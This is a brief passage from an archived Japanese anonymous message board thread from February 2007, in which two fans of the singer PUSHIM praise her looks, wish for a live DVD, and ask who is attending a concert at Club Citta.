158 :名無しの歌姫:2007/02/19(月) 18:24:21 ID:OSmfvBfP
正直PUSHIMはキレイだとおも。

QUEENDOMのライブDVD観てぇ…

159 :名無しの歌姫:2007/02/23(金) 20:11:24 ID:mCi2413l
クラブチッタでやるPUSHIMとかのライブ行く人いません??

28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)